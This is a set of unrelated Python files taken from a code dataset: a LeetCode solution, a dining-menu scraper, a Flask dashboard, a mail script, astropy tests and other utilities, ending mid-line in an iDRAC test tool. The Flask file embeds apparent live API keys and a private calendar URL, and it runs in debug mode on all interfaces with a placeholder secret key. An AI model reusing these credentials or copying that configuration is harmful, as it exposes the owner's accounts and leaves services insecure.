20],\r\n# ⁠ [23, 30, 34, 50]\r\n# ]\r\n# target = 13\r\n# Output: false\r\n#\r\n#\r\n\r\n\r\nclass Solution:\r\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\r\n if len(matrix) == 0 or len(matrix[0]) == 0:\r\n return False\r\n low, row, col = 0, len(matrix), len(matrix[0])\r\n high = row * col - 1\r\n while low <= high:\r\n mid = low + (high - low) // 2\r\n current = matrix[mid // col][mid % col]\r\n if current < target:\r\n low = mid + 1\r\n elif current != target:\r\n high = mid - 1\r\n else:\r\n return True\r\n return False\r\n","sub_path":"leetcode-algorithms/074. Search a 2D Matrix/74.search-a-2-d-matrix.py","file_name":"74.search-a-2-d-matrix.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42011884","text":"#Dining Menu Web Scraper\n\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport sys\nfrom dining_objs import *\nimport json\nfrom database import *\nimport time\n\n\ndef get_first_child(tag):\n\treturn next(tag.children)\n\t\ndef move_down(tag, level):\n\tfor x in range(level):\n\t\tif tag == None:\n\t\t\treturn None\n\t\ttag = get_first_child(tag)\n\treturn tag\n\ndef get_page(url):\n\treq = urlopen(url)\n\treturn req.read()\n\ndef get_content_list(table):\n\t#Find the station names, stored in an
tag at the table's top level\n\titems = table.find_all('a', recursive=False)\n\titem_list = []\n\tfor item in items:\n\t\titem_str = str(item.string).strip()\n\t\titem_str = item_str[:len(item_str) - (2 if item_str[len(item_str) - 1] == \">\" else 0)].strip()\n\t\titem_list.append(item_str)\n\treturn item_list\n\ndef get_station_nutrition(table):\n\tnut_sections = table.find_all('div', {\"class\" : \"section\"}, recursive=False)\n\tfor x in range(len(nut_sections)):\n\t\tnut_sections[x] = move_down(nut_sections[x], 2)\n\t#Now get the nutritional information for each item:\n\tnut_list = []\n\tfor item_nuts in nut_sections:\n\t\tmy_nuts = []\n\t\t#The actual nutritional information. Pull info from \"item\" attrs\n\t\tfor nut_tag in item_nuts.children:\n\t\t\tif nut_tag.has_attr('n') and nut_tag.has_attr('v'):\n\t\t\t\tname = str(nut_tag['n']).strip()\n\t\t\t\tvalue = str(nut_tag['v']).strip().replace('Â\\xa0', ' ')\n\t\t\t\t#Make sure relevant attrs have valid values\n\t\t\t\tif name != \"\" and value != \"\" and value.find(\"99999.99\") == -1:\n\t\t\t\t\tmy_nuts.append(name + \": \" + value)\n\t\tnut_list.append(my_nuts)\n\treturn nut_list\n\t\ndef get_station_menus(table):\n\t#Tables containing menu items at each station, indices correspond with station\n\tstation_tables = table.find_all('div', recursive=False)\n\tstation_menus = []\n\tfor table in station_tables:\n\t\titems = get_content_list(table)\n\t\tnutritional_info = get_station_nutrition(table)\n\t\t#Zip into a single list\n\t\titems = list(zip(items, nutritional_info))\n\t\tstation_menus.append(items)\n\treturn station_menus\n\ndef build_menu(table):\n\t\"\"\"Menu format: [[station, [item, [nutrition]]]]\"\"\"\n\tstations = get_content_list(table)\n\tstation_menus = get_station_menus(table)\n\treturn list(zip(stations, station_menus))\n\t\ndef get_menu(name, id):\n\turl = \"http://www.campusdish.com/en-US/CSMA/Virginia/Home.htm?LocationID=\" + id\n\thtml = get_page(url)\n\t\n\tsoup = BeautifulSoup(html)\n\n\thas_dinner = len(soup.find_all(\"img\", id=\"DinnerICN\")) != 0\n\thas_brunch = len(soup.find_all(\"img\", id=\"BrunchICN\")) != 0\n\n\tbreakfast, brunch, lunch, dinner = None, None, None, None\n\t\n\tfirst = move_down(soup.find(\"table\", id=\"menu1\"), 2)\n\tsecond = move_down(soup.find(\"table\", id=\"menu2\"), 2)\n\tthird = move_down(soup.find(\"table\", id=\"menu3\"), 2)\n\n\t#These could be swapped based on which is present\n\tif has_dinner and not has_brunch:\n\t\tlunch = first\n\t\tdinner = second\n\t\tbreakfast = third\n\telif has_brunch and not has_dinner:\n\t\tbrunch = first\n\telif has_brunch:\n\t\tdinner = first\n\t\tbrunch = second\n\telse:\n\t\tlunch = first\n\t\tbreakfast = second\n\n\tfull_menu = []\n\n\tif lunch != None:\n\t\tfull_menu.append([\"Lunch\", build_menu(lunch)])\n\tif dinner != None:\n\t\tfull_menu.append([\"Dinner\", build_menu(dinner)])\n\tif breakfast != None:\n\t\tfull_menu.append([\"Breakfast\", build_menu(breakfast)])\n\tif brunch != None:\n\t\tfull_menu.append([\"Brunch\", build_menu(brunch)])\n\n\treturn [name, full_menu]\n\ndef pull_options(home_page):\n\tsoup = BeautifulSoup(get_page(home_page))\n\tselect = soup.find(\"select\", {\"name\" : \"WucChalkboard1:findLocations\"})\n\tchildren = select.find_all(\"option\")\n\toptions_list = []\n\tfor bitch_please in children:\n\t\tid = bitch_please['value']\n\t\thall_name = str(bitch_please.string)\n\t\toptions_list.append([hall_name, id])\n\treturn options_list\n\ndef convert_list(menu_list):\n\tdining_halls = []\n\tfor hall in menu_list:\n\t\tdining_halls.append(DiningHall(hall[0], [Meal(meal[0], [Station(station[0], [Item(item[0], item[1]) for item in station[1]]) for station in meal[1]]) for meal in hall[1]]))\n\treturn dining_halls\n\t\t\n\t\n\ndef do_scrape():\n\toptions = pull_options(\"http://www.campusdish.com/en-us/CSMA/VIRGINIA\")\n\tmenu_list = []\n\tfor option in options:\n\t\tmenu_list.append(get_menu(option[0], option[1]))\n\treturn convert_list(menu_list)\n\ndef run_scraper():\n\twhile True:\n\t\tdining_halls = do_scrape()\n\t\t#json = get_json(dining_halls)\n\t\t#open(\"scraper.out\", \"w\").write(json)\n\t\tinsert_all(dining_halls)\n\t\tprint(\"Scraper run complete at \" + str(time.strftime((\"%H:%M:%S\"))))\n\t\t#Sleep between tests\n\t\ttime.sleep(60 * 60)\n\t\n","sub_path":"python/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"196680387","text":"import flask\nfrom flask import render_template\nimport feedparser\nimport random\nimport time\nimport json\nimport urllib\nimport datetime\nimport uuid\nfrom flask_oauthlib.client import OAuth\nimport config\n\n#from ics import Calendar\n#import pytz\n#from pytz import timezone\n#from newsapi import NewsApiClient\n\n\"\"\"\n--Weather api call: http://api.openweathermap.org/data/2.5/weather?appid=e422a718b0bc6e6633fe25bc86c5ee57&q=east%20grinstead,uk\nConditions list found here: http://openweathermap.org/weather-conditions\nUse on the first category\n\n--Quotes--\nLine per quote in quotes.txt. Line will be pulled randomly on load/every 30mins.\n\n--Tube data--\nhttps://api.tfl.gov.uk/Line/Mode/tube/Status?app_id=2a69bd54&app_key=f7dba5cab390f9e3c86e188408255324\n\nApplication ID: 2a69bd54 | Application Keys: f7dba5cab390f9e3c86e188408255324\n\n--Reload--\nCurrently set in index.html meta content=\"1800\" value in seconds.\n\n--Calendar URL--\nAppID: dmoeDVOF[sylCCA26059_@-\nAppID: 0f756d8d-6e4f-4b28-805a-41d4e7a92a0e\n\nhttps://outlook.office.com/api/v2.0/me/calendarview\n\nhttps://calendar.google.com/calendar/ical/cg1207%40gmail.com/private-70f93b7a241a13d283be8909ec02c2c9/basic.ics\n\"\"\"\n\nAPP = flask.Flask(__name__, template_folder='templates')\nAPP.debug = True\nAPP.secret_key = 'development'\nOAUTH = OAuth(APP)\nMSGRAPH = OAUTH.remote_app(\n 'microsoft', consumer_key=config.CLIENT_ID, consumer_secret=config.CLIENT_SECRET,\n request_token_params={'scope': config.SCOPES},\n base_url=config.RESOURCE + config.API_VERSION + '/',\n request_token_url=None, access_token_method='POST',\n access_token_url=config.AUTHORITY_URL + config.TOKEN_ENDPOINT,\n authorize_url=config.AUTHORITY_URL + config.AUTH_ENDPOINT)\n\n@APP.route('/login')\ndef login():\n \"\"\"Prompt user to authenticate.\"\"\"\n flask.session['state'] = str(uuid.uuid4())\n return MSGRAPH.authorize(callback=config.REDIRECT_URI, state=flask.session['state'])\n\n@APP.route('/login/authorized')\ndef authorized():\n \"\"\"Handler for the application's Redirect Uri.\"\"\"\n if str(flask.session['state']) != str(flask.request.args['state']):\n raise Exception('state returned to redirect URL does not match!')\n response = MSGRAPH.authorized_response()\n flask.session['access_token'] = response['access_token']\n return flask.redirect('/')\n\n@APP.route('/graphcall')\ndef graphcall():\n #Confirm user authentication by calling Graph and displaying some data.\n todaydate = datetime.datetime.now().date().strftime('%Y/%m/%d')\n endpoint = 'me/calendarview?StartDateTime=2018-04-24T01:00:00&EndDateTime=2018-04-24T23:59:00'\n print(endpoint)\n #endpoint = 'me/calendarview' + '?StartDateTime=' + todaydate + '&EndDateTime=' + todaydate\n headers = {'SdkVersion': 'sample-python-flask',\n 'x-client-SKU': 'sample-python-flask',\n 'client-request-id': str(uuid.uuid4()),\n 'return-client-request-id': 'true'}\n outlookdata = MSGRAPH.get(endpoint, headers=headers).data['value']\n\n meetings = []\n\n for ev in outlookdata:\n event_item = ev['subject']\n meetings.append(event_item)\n\n #graphdata = outlookdata['value'][1]['subject']\n return flask.render_template('graphcall.html',\n graphdata=meetings,\n endpoint=config.RESOURCE + config.API_VERSION + '/' + endpoint,\n sample='Flask-OAuthlib')\n\n@MSGRAPH.tokengetter\ndef get_token():\n \"\"\"Called by flask_oauthlib.client to retrieve current access token.\"\"\"\n return (flask.session.get('access_token'), '')\n\n#THE ACTUAL PAGE\n@APP.route('/')\ndef index():\n #weather\n weather_url = 'http://api.openweathermap.org/data/2.5/weather?appid=e422a718b0bc6e6633fe25bc86c5ee57&units=metric&q=london,uk'\n weather_list = json.load(urllib.request.urlopen(weather_url))\n weather_description = weather_list['weather'][0]['description']\n weather_icon = weather_list['weather'][0]['icon']\n weather_icon_url = '/static/images/weather/' + weather_icon + '.svg'\n temperature = int(weather_list['main']['temp'])\n date=\"{:%A %d %B %Y}\".format(datetime.datetime.now().date())\n \n #quote\n random_quote = random.choice(open('quotes.txt').readlines())\n\n #Meetings list\n todaydate = datetime.datetime.now().date().strftime('%Y/%m/%d')\n endpoint = 'me/calendarview?StartDateTime=2018-04-24T01:00:00&EndDateTime=2018-04-24T23:59:00'\n print(endpoint)\n #endpoint = 'me/calendarview' + '?StartDateTime=' + todaydate + '&EndDateTime=' + todaydate\n headers = {'SdkVersion': 'keko-mirror',\n 'x-client-SKU': 'keko-mirror',\n 'client-request-id': str(uuid.uuid4()),\n 'return-client-request-id': 'true'}\n outlookdata = MSGRAPH.get(endpoint, headers=headers).data['value']\n \n meetings = []\n\n for ev in outlookdata:\n event_item = ev['start']['dateTime'][11:][:-11] + ' - ' + ev['end']['dateTime'][11:][:-11] + ' ' + ev['subject']\n meetings.append(event_item)\n\n #Tube URL\n tube_url=\"https://api.tfl.gov.uk/Line/Mode/tube/Status?app_id=2a69bd54&app_key=f7dba5cab390f9e3c86e188408255324\"\n tube_status = json.load(urllib.request.urlopen(tube_url))\n\n tube = []\n\n for s in tube_status:\n tube_item = s['id'] + ' - ' + s['lineStatuses'][0]['statusSeverityDescription']\n #if 'Good Service' not in tube_item:\n tube.append(tube_item.title())\n\n #BBC News feed\n bbcfeedurl = \"http://feeds.bbci.co.uk/news/rss.xml?edition=uk\"\n bbcfeed = feedparser.parse(bbcfeedurl)\n news = []\n\n for i in range(8):\n \titem = bbcfeed['items'][i]['title']\n \tnews.append(item)\n\n return render_template('index.html', temp=temperature, date=date, cal=meetings, news=news, quote=random_quote, tube=tube, weathericon=weather_icon_url)\n\nAPP.run(host='0.0.0.0', debug=True)\n\n\"\"\"app.secret_key = 'development'\nOAUTH = OAuth(app)\nMSGRAPH = OAUTH.remote_app(\n 'microsoft',\n consumer_key=config.CLIENT_ID,\n consumer_secret=config.CLIENT_SECRET,\n request_token_params={'scope': config.SCOPES},\n base_url=config.RESOURCE + config.API_VERSION + '/',\n request_token_url=None,\n access_token_method='POST',\n access_token_url=config.AUTHORITY_URL + config.TOKEN_ENDPOINT,\n authorize_url=config.AUTHORITY_URL + config.AUTH_ENDPOINT)\"\"\"\n\n\n\"\"\"quotedata= json.load(urllib.request.urlopen(\"http://quotes.rest/qod.json?category=management\"))\nquote = quotedata['contents']['quotes'][0]['quote']\nauthor = quotedata['contents']['quotes'][0]['author']\n#author = \"Voltaire\"\ndesc=weather_description.capitalize()\n#quote = 'Each player must accept the cards life deals him or her: but once they are in hand, he or she alone must decide how to play the cards in order to win the game.'\n\"\"\"\n\n#Calandar\n\"\"\"\ncalurl = \"https://calendar.google.com/calendar/ical/cg1207%40gmail.com/private-70f93b7a241a13d283be8909ec02c2c9/basic.ics\"\nc = Calendar(urllib.request.urlopen(calurl).read().decode('iso-8859-1'))\ncal = c.events\n\nmeetings = []\n\nfor i in range(6):\n event = cal[i]\n meetings.append(event.begin)\n\"\"\"\n\n\n#condition_id = weather_main[:2] #remove day/night\n #condition_id = '09'\n #condition_type = {'01' : 'clear sky', '02' : 'few clouds', '03' : 'Scattered Clouds', '04' : 'broken clouds', '09' : 'Shower rain', '10' : 'Rain', '11' : 'Thunderstorm', '13' : 'snow', '50' : 'mist'}\n #condition_color = {'01' : '0.55,0.4', '02' : '0.4,0.45', '03' : '0.3,0.3', '04' : '0.2,0.25', '09' : '0.1,0.2', '10' : '0.1,0.1', '11' : '0.25,0.05', '13' : '0.25,0.15', '50' : 'mist'}\n #return (condition_type.get(condition_id, 0))\n","sub_path":"keko_mirror.py","file_name":"keko_mirror.py","file_ext":"py","file_size_in_byte":7494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"266420957","text":"import smtplib, sys, datetime\n#Arg 1 is the From_email\nfrom_addr = str(sys.argv[1])\n#Arg 2 is the Password\npwd = str(sys.argv[2])\n#Arg 3 is the To Email\nto_addr = str(sys.argv[3])\n#Arg 4 is the subject\nsubj = str(sys.argv[4])\n#Arg 5 is the message\nmsg = str(sys.argv[5])\n#Arg 5 is the person it was generated for\nfur = str(sys.argv[6])\nfull_msg = \"From: %s\\nTo: %s\\nSubject: %s\\nDate: %s\\n\\n%s\" % ( from_addr, to_addr, subj, datetime.datetime.now().strftime( \"%d/%m/%Y %H:%M\" ), (msg+\"\\nThis has been atuomatically generated for \"+fur) )\nmailserver = smtplib.SMTP('smtp.office365.com',587)\nmailserver.ehlo()\nmailserver.starttls()\nmailserver.login(from_addr, pwd)\nmailserver.sendmail(from_addr,to_addr,full_msg)\nmailserver.quit()\n","sub_path":"Python/Mail.py","file_name":"Mail.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105978118","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport pytest\nimport numpy as np\n\nfrom matplotlib.transforms import Affine2D, IdentityTransform\n\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.visualization.wcsaxes.fitswcs import WCSWorld2PixelTransform\nfrom astropy.visualization.wcsaxes.fitswcs import transform_coord_meta_from_wcs\n\nWCS2D = WCS(naxis=2)\nWCS2D.wcs.ctype = ['x', 'y']\nWCS2D.wcs.cunit = ['km', 'km']\nWCS2D.wcs.crpix = [614.5, 856.5]\nWCS2D.wcs.cdelt = [6.25, 6.25]\nWCS2D.wcs.crval = [0., 0.]\n\nWCS3D = WCS(naxis=3)\nWCS3D.wcs.ctype = ['x', 'y', 'z']\nWCS3D.wcs.cunit = ['km', 'km', 'km']\nWCS3D.wcs.crpix = [614.5, 856.5, 333]\nWCS3D.wcs.cdelt = [6.25, 6.25, 23]\nWCS3D.wcs.crval = [0., 0., 1.]\n\n\ndef test_shorthand_inversion():\n \"\"\"\n Test that the Matplotlib subtraction shorthand for composing and inverting\n transformations works.\n \"\"\"\n w1 = WCS(naxis=2)\n w1.wcs.ctype = ['RA---TAN', 'DEC--TAN']\n w1.wcs.crpix = [256.0, 256.0]\n w1.wcs.cdelt = [-0.05, 0.05]\n w1.wcs.crval = [120.0, -19.0]\n\n w2 = WCS(naxis=2)\n w2.wcs.ctype = ['RA---SIN', 'DEC--SIN']\n w2.wcs.crpix = [256.0, 256.0]\n w2.wcs.cdelt = [-0.05, 0.05]\n w2.wcs.crval = [235.0, +23.7]\n\n t1 = WCSWorld2PixelTransform(w1)\n t2 = WCSWorld2PixelTransform(w2)\n\n assert t1 - t2 == t1 + t2.inverted()\n assert t1 - t2 != t2.inverted() + t1\n assert t1 - t1 == IdentityTransform()\n\n\n# We add Affine2D to catch the fact that in Matplotlib, having a Composite\n# transform can end up in more strict requirements for the dimensionality.\n\n\ndef test_2d():\n\n world = np.ones((10, 2))\n\n w1 = WCSWorld2PixelTransform(WCS2D) + Affine2D()\n pixel = w1.transform(world)\n world_2 = w1.inverted().transform(pixel)\n\n np.testing.assert_allclose(world, world_2)\n\n\ndef test_3d():\n\n world = np.ones((10, 3))\n\n w1 = WCSWorld2PixelTransform(WCS3D, slice=('y', 0, 'x')) + Affine2D()\n pixel = w1.transform(world)\n world_2 = w1.inverted().transform(pixel)\n\n np.testing.assert_allclose(world[:, 0], world_2[:, 0])\n np.testing.assert_allclose(world[:, 2], world_2[:, 2])\n\n\nCTYPE_CASES = [(' LON-TAN', ('longitude', None, None)),\n (' LAT-TAN', ('latitude', None, None)),\n ('HPLN-TAN', ('longitude', u.arcsec, 180.)),\n ('HPLT-TAN', ('latitude', u.arcsec, None)),\n ('RA---TAN', ('longitude', u.hourangle, None)),\n ('DEC--TAN', ('latitude', None, None)),\n ('spam', ('scalar', None, None))]\n\n\n@pytest.mark.parametrize(('ctype', 'coord_info'), CTYPE_CASES)\ndef test_coord_type_from_ctype(ctype, coord_info):\n\n wcs = WCS(naxis=1)\n wcs.wcs.ctype = [ctype]\n wcs.wcs.crpix = [256.0]\n wcs.wcs.cdelt = [-0.05]\n wcs.wcs.crval = [120.0]\n\n _, coord_meta = transform_coord_meta_from_wcs(wcs)\n\n assert coord_meta['type'][0] == coord_info[0]\n assert coord_meta['format_unit'][0] == coord_info[1]\n assert coord_meta['wrap'][0] == coord_info[2]\n","sub_path":"astropy/visualization/wcsaxes/tests/test_fitswcs.py","file_name":"test_fitswcs.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"449774255","text":"import gym\nimport numpy as np\n\nSTEPS = None\nEPISODES = None\nENV = None\n\ndef to_action(parameters, observations): # -> action\n return int(np.matmul(parameters, observations) >= 0)\n\ndef run_episode(parameters):\n observations = ENV.reset()\n total_reward = 0\n for _ in range(STEPS):\n parameters \n observations, reward, done, info = ENV.step(\n to_action(parameters, observations))\n total_reward += reward\n if done: break\n return total_reward\n\ndef run_experiment(parameters):\n print(\"Experiment:\",parameters,end=\"\")\n avg_reward = 0\n for _ in range(EPISODES):\n avg_reward += run_episode(parameters)\n avg_reward /= EPISODES\n print(\"| Average Reward:\",avg_reward)\n return avg_reward\n\n\ndef init(_STEPS, _EPISODES):\n global STEPS, EPISODES, ENV\n STEPS, EPISODES = _STEPS, _EPISODES\n ENV = gym.make(\"CartPole-v0\")\n\ndef run(experiments):\n max_parameters = None\n max_reward = 0\n for parameters in experiments:\n average_reward = run_experiment(parameters)\n if average_reward > max_reward:\n max_parameters = parameters\n max_reward = average_reward \n print(\"-----------------------------------------\")\n print(\"Max Parameters :\", max_parameters)\n print(\"Max Reward :\", max_reward)\n return max_parameters, max_reward","sub_path":"CartPole-v0/cartpole01.py","file_name":"cartpole01.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"54447844","text":"# -*- coding: utf-8 -*-\n# Advent of Code 2019 - Day 9\n\n# BOOST\nimport sys\nsys.path.append(\"../python_modules/custom\")\nfrom intcomputer import Intcomputer\n\ncom = Intcomputer(list(map(int, open(\"boost.txt\", \"r\").read().split(\",\"))))\n\ncom.input([2])\ncom.run()\n\nprint(\"Output:\", com.output()[0])\n","sub_path":"Day_9/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"141733067","text":"'''\nJob request creation and manipulation library for the Voxel51 Vision Services\nAPI.\n\n| Copyright 2017-2018, Voxel51, LLC\n| `voxel51.com `_\n'''\nimport voxel51.utils as voxu\n\n\nDATA_ID_FIELD = \"data-id\"\nSIGNED_URL_FIELD = \"signed-url\"\n\n\nclass JobState(object):\n '''Enum describing the possible states of a job.'''\n\n READY = \"READY\"\n QUEUED = \"QUEUED\"\n RUNNING = \"RUNNING\"\n FAILED = \"FAILED\"\n COMPLETE = \"COMPLETE\"\n\n\nclass JobExecutionError(Exception):\n '''Error raised when there is a problem with the execution of a job.'''\n pass\n\n\nclass JobRequest(voxu.Serializable):\n '''Class encapsulating a job request for the API.\n\n Attributes:\n analytic (str): the ID of the analytic to run\n inputs (dict): a dictionary mapping input names to RemoteDataPath\n instances\n parameters (dict): a dictionary mapping parameter names to values\n '''\n\n def __init__(self, analytic_id):\n '''Initializes a JobRequest instance for the given analytic.\n\n Args:\n analytic_id (str): the ID of the analytic to run\n '''\n self.analytic = analytic_id\n self.inputs = {}\n self.parameters = {}\n\n def set_input(self, name, path=None, **kwargs):\n '''Sets the input of the given name.\n\n The input value can be specified either as a RemoteDataPath instance\n or as valid keyword arguments to construct one.\n\n Args:\n name (str): the input name to set\n path (RemoteDataPath, optional): a RemoteDataPath instance. If not\n specified, valid kwargs must be provided\n **kwargs: valid argument(s) for RemoteDataPath()\n '''\n self.inputs[name] = path or RemoteDataPath(**kwargs)\n\n def set_data_parameter(self, name, path=None, **kwargs):\n '''Sets the data parameter of the given name.\n\n Data parameters are parameters that are defined by a RemoteDataPath\n instance and are read from cloud storage at runtime by the Vision\n Engine. The parameter can be specified either as a RemoteDataPath\n instance or as valid keyword arguments to construct one.\n\n Args:\n name (str): the input name to set\n path (RemoteDataPath, optional): a RemoteDataPath instance. If not\n specified, valid kwargs must be provided\n **kwargs: valid argument(s) for RemoteDataPath()\n '''\n self.parameters[name] = path or RemoteDataPath(**kwargs)\n\n def set_parameter(self, name, val):\n '''Sets the (non-data) parameter of the given name.\n\n Non-data parameters are parameters whose values are defined directly by\n a value that is JSON serializable.\n\n Args:\n name (str): the input name to set\n val: the parameter value, which must be JSON serializable\n '''\n self.parameters[name] = val\n\n @classmethod\n def from_dict(cls, d):\n '''Constructs a JobRequest instance from a JSON dictionary.\n\n Args:\n d (dict): a JSON dictionary defining a JobRequest instance\n\n Returns:\n a JobRequest instance\n '''\n job_request = cls(d[\"analytic\"])\n\n # Set inputs\n for name, val in d[\"inputs\"].items():\n job_request.set_input(name, path=RemoteDataPath.from_dict(val))\n\n # Set parameters\n for name, val in d[\"parameters\"].items():\n if RemoteDataPath.is_remote_path_dict(val):\n # Data parameter\n job_request.set_data_parameter(\n name, path=RemoteDataPath.from_dict(val))\n else:\n # Non-data parameter\n job_request.set_parameter(name, val)\n return job_request\n\n\nclass RemoteDataPath(voxu.Serializable):\n '''Class enapsulating a remote data path.\n\n Attributes:\n data_id (str): the ID of the data in cloud storage\n signed_url (str): a signed URL with access to the data of interest\n in third-party cloud storage\n '''\n\n def __init__(self, data_id=None, signed_url=None):\n '''Creates a RemoteDataPath instance defined by the given information.\n\n Exactly one keyword value must be supplied to this constructor.\n\n Args:\n data_id (str, optional): the ID of the data in cloud storage\n signed_url (str, optional): a signed URL with access to the data\n of interest in third-party cloud storage\n\n Raises:\n RemoteDataPathError if the instance creation failed\n '''\n self.data_id = data_id\n self.signed_url = signed_url\n if not self.is_valid:\n raise RemoteDataPathError(\"Invalid RemoteDataPath\")\n\n @classmethod\n def from_data_id(cls, data_id):\n '''Creates a RemoteDataPath instance defined by the given data ID.\n\n Args:\n data_id (str): the ID of the data in cloud storage\n\n Returns:\n a RemoteDataPath instance with the given data ID\n '''\n return cls(data_id=data_id)\n\n @classmethod\n def from_signed_url(cls, signed_url):\n '''Creates a RemoteDataPath instance defined by the given signed URL.\n\n Args:\n signed_url (str): a signed URL with access to the data of interest\n in third-party cloud storage\n\n Returns:\n a RemoteDataPath instance with the given signed URL\n '''\n return cls(signed_url=signed_url)\n\n @property\n def has_data_id(self):\n '''Determines whether this RemoteDataPath instance has a data ID.\n\n Returns:\n True if this instance has a data ID, and False otherwise\n '''\n return self.data_id is not None\n\n @property\n def has_signed_url(self):\n '''Determines whether this RemoteDataPath instance has a signed URL.\n\n Returns:\n True if this instance has a signed URL, and False otherwise\n '''\n return self.signed_url is not None\n\n @property\n def is_valid(self):\n '''Determines whether this RemoteDataPath instance is valid.\n\n Returns:\n True if this instance is valid, and False otherwise\n '''\n return self.has_data_id ^ self.has_signed_url\n\n @staticmethod\n def is_remote_path_dict(val):\n '''Determines whether the given value defines a valid RemoteDataPath\n dictionary.\n\n Args:\n val: either a JSON dictionary representation of a RemoteDataPath\n instance or another arbitrary value\n\n Returns:\n True if val is a valid RemoteDataPath JSON dictionary, and False\n otherwise\n '''\n return (\n isinstance(val, dict) and RemoteDataPath.from_dict(val).is_valid\n )\n\n @classmethod\n def from_dict(cls, d):\n '''Constructs a RemoteDataPath instance from a JSON dictionary.\n\n Args:\n d (dict): a JSON dictionary defining a RemoteDataPath instance\n\n Returns:\n a RemoteDataPath instance\n '''\n if DATA_ID_FIELD in d:\n return cls(data_id=d[DATA_ID_FIELD])\n elif SIGNED_URL_FIELD in d:\n return cls(signed_url=d[SIGNED_URL_FIELD])\n raise RemoteDataPathError(\"Invalid RemoteDataPath dict: %s\" % str(d))\n\n def _attributes(self):\n if self.has_data_id:\n return {\"data_id\": DATA_ID_FIELD}\n elif self.has_signed_url:\n return {\"signed_url\": SIGNED_URL_FIELD}\n raise RemoteDataPathError(\"Invalid RemoteDataPath\")\n\n\nclass RemoteDataPathError(Exception):\n '''Error raised when an invalid RemoteDataPath instance is found.'''\n pass\n","sub_path":"voxel51/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":7695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"123297051","text":"#===================================================================#\n# Tool Name: MiG5 iDRAC FVS Tool #\n# Version: 0.1 #\n# Edit by: Chris Liu 2017/12/14 #\n#===================================================================#\nimport sys\nimport datetime\nimport subprocess\nimport os\nimport time\nimport ctypes\n\nglobal VER\nVER = \"0.1\"\n\nglobal LOG_FILE\nLOG_FILE = \"test.log\"\n\nglobal ROOT_DIR\nROOT_DIR = os.getcwd()\n\nglobal LOG_DIR\nLOG_DIR = os.path.join(ROOT_DIR, \"Log\")\n\nglobal DEBUG_MODE\nDEBUG_MODE = True\n\nglobal FAIL_CONTINUE\nFAIL_CONTINUE = False\n\nglobal SLED_DPN\nSLED_DPN = \"0H910X\"\n\nFONT_NONE = 0\nFONT_WHITE = 1\nFONT_RED = 2\nFONT_GREEN = 3\nFONT_YELLOW = 4\n\nPASS_BANNER = \"\"\"\n######## ### ###### ###### #### ####\n## ## ## ## ## ## ## ## #### ####\n## ## ## ## ## ## #### ####\n######## ## ## ###### ###### ## ##\n## ######### ## ##\n## ## ## ## ## ## ## #### ####\n## ## ## ###### ###### #### ####\n\"\"\"\n\nFAIL_BANNER = \"\"\"\n######## ### #### ## #### ####\n## ## ## ## ## #### ####\n## ## ## ## ## #### ####\n###### ## ## ## ## ## ##\n## ######### ## ##\n## ## ## ## ## #### ####\n## ## ## #### ######## #### ####\n\"\"\"\n#===============================================================================\ndef INIT():\n\tglobal LOG_FILE\n\tglobal LOG_DIR\n\tglobal ASSET_TAG\n\tglobal SERVICE_TAG\n\n\tcmd = \"ifconfig -a eth0 | grep HWaddr | awk '{print $5}'\"\n\tsled_mac = subprocess.Popen(cmd, stdout = subprocess.PIPE, shell = True, universal_newlines = True).communicate()[0].split(\"\\n\")[0]\n\n\tcmd = \"ifconfig eth0 | grep \\\"inet addr:\\\"\"\n\tsled_ip = subprocess.Popen(cmd, stdout = subprocess.PIPE, shell = True, universal_newlines = True).communicate()[0].split(\"\\n\")[0].strip().split()[1].split(\":\")[1]\n\n\tf = open(\"/usr/local/scan/%s/scan.dat\"%(sled_mac), \"r\")\n\tret1 = f.readlines()\n\tfor i in range(len(ret1)):\n\t\tret1[i] = ret1[i].strip()\n\tf.close()\n\n\tsled_ppid = \"\"\n\n\tfor i in ret1:\n\t\tif(\"PPID\" in i):\n\t\t\tsled_ppid = i.split(\"=\", 1)[1].strip()\n\t\tif(\"Asset Tag\" in i):\n\t\t\tASSET_TAG = i.split(\"=\", 1)[1].strip()\n\t\tif(\"Service Tag\" in i):\n\t\t\tSERVICE_TAG = i.split(\"=\", 1)[1].strip()\n\n\tif(sled_ppid[2:8] != SLED_DPN):\n\t\tLog(\"SLED DPN Error (%s != %s)\"%(sled_ppid[2:8], SLED_DPN), FONT_RED)\n\t\tsys.exit(-1)\n\n\tLOG_DIR = os.path.join(\"/usr/local/scan/%s\"%(sled_ppid))\n\n\tif(os.path.isdir(LOG_DIR) == False):\n\t\tos.mkdir(LOG_DIR)\n\n\tLOG_FILE = \"LOG_%s_%s.txt\"%(os.path.basename(__file__).split(\".\")[0], datetime.datetime.strftime(datetime.datetime.now(), \"%m%d-%H%M\"))\n#===============================================================================\ndef Banner(msg):\n\tline_0 = \"#\" + \"=\"*78 + \"#\"\n\tline_1 = \"#\" + \" \"*78 + \"#\"\n\ttmp_str = \"#\" + msg.center(78) + \"#\"\n\n\tif(sys.platform == \"win32\"):\n\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 